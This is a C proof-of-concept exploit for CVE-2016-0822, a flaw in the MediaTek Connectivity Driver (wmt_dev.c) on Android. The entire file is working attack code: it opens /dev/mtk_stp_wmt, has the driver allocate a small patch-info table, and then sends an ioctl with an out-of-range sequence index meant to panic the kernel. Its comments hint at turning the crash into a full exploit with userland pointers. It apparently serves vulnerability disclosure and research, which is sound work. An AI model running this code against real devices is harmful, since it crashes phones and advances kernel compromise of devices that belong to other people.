/**
 *
 * CVE-2016-0822-mtk.c
 *
 * Proof of concept for a series of issues in the MediaTek Connectivity Driver
 * (the WMT_IOCTL_SET_PATCH_NUM / WMT_IOCTL_SET_PATCH_INFO handling in wmt_dev.c).
 * The PoC deliberately sends an out-of-range sequence index; a "successful"
 * run is expected to crash the kernel (panic or GPF), so only run it on a
 * device you can afford to reboot.
 *
 * https://android.googlesource.com/kernel/mediatek/+/d13e4b9986d3e6f57dbd595d5a8398c254d45fa4/drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1174
 *
 * https://android.googlesource.com/kernel/mediatek/+/d13e4b9986d3e6f57dbd595d5a8398c254d45fa4/drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1158
 *
 */
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
/* ioctl request numbers for the wmt device node.
 * NOTE(review): _IOW folds sizeof(type) into the request number, so
 * WMT_IOCTL_SET_PATCH_INFO (sizeof(char*)) differs between 32-bit and 64-bit
 * userland builds; it must match the driver's own definition or the ioctl
 * will not be dispatched at all. */
#define WMT_IOC_MAGIC 0xa0
/* Argument is an int: how many WMT_PATCH_INFO entries the driver should allocate. */
#define WMT_IOCTL_SET_PATCH_NUM _IOW(WMT_IOC_MAGIC, 14, int)
/* Argument is a pointer to a userland WMT_PATCH_INFO (layout below). */
#define WMT_IOCTL_SET_PATCH_INFO _IOW(WMT_IOC_MAGIC, 15, char*)
/* Kernel-style aliases so the struct reads like the driver's declaration. */
#define UINT32 uint32_t
#define UINT8 uint8_t
/* Userland mirror of the driver's patch-info record. The layout is part of
 * the ioctl ABI (presumably copied in by the driver as-is), so do not reorder
 * or resize fields: 4 + 4 + 256 = 264 bytes, no padding. */
typedef struct {
UINT32 dowloadSeq; /* sequence/index value handed to the driver ("dowload" sic, matches the kernel name) */
UINT8 addRess[4];
UINT8 patchName[256]; /* this PoC fills it entirely, i.e. no NUL terminator */
} WMT_PATCH_INFO;
/* Device node exposed by the MediaTek wmt driver. */
static const char *driver = "/dev/mtk_stp_wmt";
/*
 * Open the wmt device node read/write and return its descriptor.
 * On failure the reason is printed and the process exits: nothing else in
 * the PoC can proceed without the device.
 */
static int open_driver(void)
{
	int dev_fd = open(driver, O_RDWR);

	if (dev_fd >= 0) {
		return dev_fd;
	}

	printf("Failed to open %s, with errno %s\n", driver, strerror(errno));
	exit(EXIT_FAILURE);
}
/*
 * Ask the driver to allocate its patch-info table.
 *
 * fd: descriptor returned by open_driver().
 * Exits the process if the ioctl is rejected.
 */
static void allocate_kernel_struct(int fd)
{
	/* Number of WMT_PATCH_INFO entries requested from the driver. */
	enum { PATCH_COUNT = 4 };

	if (ioctl(fd, WMT_IOCTL_SET_PATCH_NUM, PATCH_COUNT) < 0) {
		printf("Allocation of structs failed, %s\n", strerror(errno));
		exit(EXIT_FAILURE);
	}
}
/*
 * Send a WMT_PATCH_INFO whose sequence value is far outside the table
 * allocated by allocate_kernel_struct().
 *
 * fd: descriptor returned by open_driver().
 * The value is chosen in the hope of a panic or GPF; the data fields hold
 * recognisable filler only (an actual exploit would place userland pointers
 * there). Exits the process if the ioctl is rejected.
 */
static void overflow_struct(int fd)
{
	WMT_PATCH_INFO info;

	/* Absurd sequence value, presumably used as an index by the driver. */
	info.dowloadSeq = 0x31337;

	/* Fill every byte of both data fields with 'A'. */
	memset(info.addRess, 'A', sizeof info.addRess);
	memset(info.patchName, 'A', sizeof info.patchName);

	if (ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &info) < 0) {
		printf("Overflow ioctl failed %s\n", strerror(errno));
		exit(EXIT_FAILURE);
	}
}
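/*
 * Entry point: open the driver, have it allocate four patch-info entries,
 * then send the out-of-range SET_PATCH_INFO request. Each helper exits the
 * process itself on failure, so reaching the end means every ioctl was
 * accepted (on an affected kernel the last one may never return).
 *
 * Returns EXIT_SUCCESS; the descriptor is closed explicitly rather than
 * left to process teardown.
 */
int main(void)
{
	int fd = open_driver();

	allocate_kernel_struct(fd);
	overflow_struct(fd);

	close(fd);
	return EXIT_SUCCESS;
}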